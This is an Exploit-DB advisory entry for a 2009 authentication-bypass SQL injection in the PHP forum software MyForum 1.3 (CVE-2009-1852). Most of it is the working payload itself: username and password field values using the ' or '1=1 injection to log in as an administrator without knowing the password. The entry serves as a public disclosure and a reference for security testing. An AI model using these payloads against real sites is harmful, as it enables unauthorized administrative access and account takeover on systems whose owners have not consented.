MyForum 1.3 Auth Bypass Remote SQL Injection Vulnerability

2009-05-26T00:00:00
ID EDB-ID:8803
Type exploitdb
Reporter ThE g0bL!N
Modified 2009-05-26T00:00:00

Description

MyForum 1.3 (Auth Bypass) Remote SQL Injection Vulnerability. CVE-2009-1852. Webapps exploit for php platform

                                        
                                             ################################################################################################
[+] MyForum 1.3 (Auth Bypass) Remote SQL Injection
[+] Discovered By : ThE g0bL!N      
[+] Greetz : All my freind      
[+] Note: Tested On localhost :)
[+] http://www.easy-script.com/scripts-dl/myforumv1.3.zip
################################################################################################
Exploit:
-------
Username: [real_admin_name]
Password:' or '1=1
Or
Username: [real_admin_name]' or '1=1
Password:ThE g0bL!N
###############################################################################################

# milw0rm.com [2009-05-26]